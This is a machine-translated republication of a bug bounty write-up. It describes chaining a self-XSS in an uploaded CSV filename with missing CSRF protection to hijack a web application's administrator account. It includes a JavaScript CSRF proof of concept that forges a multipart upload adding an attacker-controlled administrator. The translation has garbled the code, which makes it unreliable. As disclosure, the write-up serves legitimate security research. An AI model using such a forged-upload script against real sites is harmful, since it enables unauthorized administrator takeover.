Shulou(Shulou.com)05/31 Report--

In order to solve this problem, this article introduces the corresponding analysis and solution in detail, hoping to help more partners who want to solve this problem to find a more simple and feasible way.

Not long ago, I participated in a vulnerability mass test invitation project on HackerOne. The function of the target test application (system) is to host related services for some enterprises. Ordinary users can register through the system and then use these services. Therefore, many sensitive information processing operations of users will be involved in this application. Later, starting with a XSS vulnerability, the author found the hidden danger of four-step CSRF vulnerability in the upload function, and finally constructed to achieve the administrator account hijacking of the target application.

XSS vulnerability found in uploaded file name

Two days before the start of the project, I found several medium-risk vulnerabilities and made some analysis marks on them. after in-depth research, I realized that it was very easy to lift rights by exploiting one XSS vulnerability. In addition, because the target application does not have the authentication means such as sending a change link to the mailbox or entering the current password when changing the user's registered mailbox, comprehensive vulnerability exploitation can form account hijacking. To this end, I spent a lot of time digging XSS loopholes.

But the difficulty is that because the target application does special character filtering for user input, it seems difficult to find XSS vulnerabilities. Then one night, while continuing testing, I noticed that the target app could upload CSV files to import user information, which is probably worth digging. So I constructed some special characters in uploading the CSV file, but they were still filtered out. Then, I start with the CSV file name, in which I construct the XSS statement:

.csv

Finally realized the pop-up of alert window! All right, we're done.

An attempt to synthesize CSRF by XSS

But in subsequent analysis, I realized that even if the constructed filename XSS is persistent, this XSS vulnerability can only be triggered when CSV files are uploaded. In other words, when the CSV file is uploaded, the application does not do the relevant coding filtering processing, but the file is filtered by coding after uploading to the system server. Therefore, this XSS vulnerability is currently only a Self-XSS and is not within the scope of vulnerability recognition. Although I have tried a lot of XSS Payload, I still can't bypass the server-side filtering mechanism after uploading and can't transform this kind of Self-XSS.

At this point, I have to put it aside for a while, hoping to find a way to bypass or other ways to use it in subsequent tests. Then, after further testing, I found that the target application had no CSRF protection mechanism, so I thought, can I trigger this Self-XSS with a CSRF request? So I started writing a CSRF request script right away, as follows:

History.pushState (',','/') var uploadId = UPDATE_THIS_WITH_ID; function submitRequest () {var xhr = new XMLHttpRequest (); xhr.open ("POST", `https://company.com/users/uploadFile?uploadId=${uploadId}`, true); xhr.setRequestHeader ("Accept", "text\ / html,application\ / xhtml+xml,application\ / xml" Qcoach 0.9 * / *; qcoach 0.8 "); xhr.setRequestHeader (" Accept-Language "," en-US,en;q=0.5 "); xhr.setRequestHeader (" Content-Type "," multipart\ / form-data; boundary=--1566359571913061724703232384 "); xhr.withCredentials = true Var body = "- 1566359571913061724703232384\ r\ n" + "Content-Disposition: form-data; name=\" uploadedFile\ "; filename=\"

.csv\ "\ r\ n" + "Content-Type: text/csv\ r\ n" + "\ r\ n" + "Company,User ID,LAST NAME,FIRST NAME,Access,Type,Email\ r\ n" + "H1 Company,999,Takeover,Account,System Admin,Administrator" NeemaPoC@gmail.com\ r\ n "+"-- 1566359571913061724703232384\ r\ n "+" Content-Disposition: form-data Name=\ "rosterType\"\ r\ n "+"\ r\ n "+" staff\ r\ n "+"-15663595719130617247032384\ r\ n "+" Content-Disposition: form-data Name=\ "importMethod\"\ r\ n "+"\ r\ n "+" updateAdd\ r\ n "+-15663595719130617247032384 var aBody (body.length); for (var I = 0; I < aBody.length) ABody [I] = body.charCodeAt (I); xhr.send (new Blob ([aBody]))

The function performed by the above PoC is to send POST requests at first, and then execute four requests in the process of uploading complete CSV files at 2-second intervals, which is very easy to control and judge the upload behavior of a single user. The attacker deploys the above PoC page through website control. If the administrator (Admin) of the target application is regarded as a victim, the corresponding URL link of the PoC is sent to the administrator. When he clicks to load, he can make use of the four CSRF vulnerabilities in the process of uploading the CSV file, combined with the modification of the user information in the uploaded CSV file, to add the identity of the attacker administrator. In order to indirectly realize the hijacking of the original administrator identity. The implementation mechanism is that the mailbox provided by the attacker in uploading the CSV file will receive a user name and password link of the administrator identity. By logging in to the target application with this credential, other administrator accounts can be deleted, the administrator account can be hijacked completely, and the full management rights of the target application can be obtained. Sweat.

This is the answer to the question about how to use XSS vulnerabilities to realize account hijacking by CSRF. I hope the above content can be of some help to you. If you still have a lot of doubts to be solved, you can follow the industry information channel to learn more about it.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.